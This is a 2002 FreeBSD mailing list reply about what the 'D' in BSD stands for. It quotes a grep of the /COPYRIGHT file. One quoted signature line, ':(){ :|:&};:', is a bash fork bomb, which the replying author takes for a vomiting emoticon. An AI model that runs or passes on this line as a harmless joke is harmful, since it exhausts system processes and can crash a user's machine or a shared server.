Date:      Thu, 25 Apr 2002 00:47:56 -0400 (EDT)
From:      Peter Leftwich <Hostmaster@Video2Video.Com>
To:        Edwin Groothuis <edwin@mavetju.org>
Cc:        FreeBSD LIST <FreeBSD-Questions@FreeBSD.Org>
Subject:   Re: Free _B_ _S_ ... _D_? [/COPYRIGHT]

On Wed, 24 Apr 2002, Edwin Groothuis wrote:
> > Neither URL nor the actual physical 4.3 CDROM seem to mention BSDi, OpenBSD, NetBSD, or what that pesky 'D' stands for... Berkeley Systems D--?
> Berkeley Software Distribution - You can see it in /COPYRIGHT on your harddisk. Well, if you have it installed that is :-) -Edwin
> Edwin Groothuis      |           Personal website: http://www.MavEtJu.org
> edwin@mavetju.org    |        Interested in MUDs? Visit Fatal Dimensions:

Wow, I had no idea I had a /COPYRIGHT file, nor did I recall that I had (or
shouldn't I have?) a /HARDWARE and /ERRATA files...

prompt$ cat -n /COPYRIGHT | grep -i distribution | grep BSD
    68  NOTE: The copyright of UC Berkeley's Berkeley Software Distribution ("BSD")
    77  As you know, certain of the Berkeley Software Distribution ("BSD") source

Odd that the full nomer isn't mentioned in the first 10 lines ;-)

> bash$ :(){ :|:&};:   |                    http://www.FatalDimensions.org/

Is that an emoticon of a frowney-face puking?

--
Peter Leftwich
President & Founder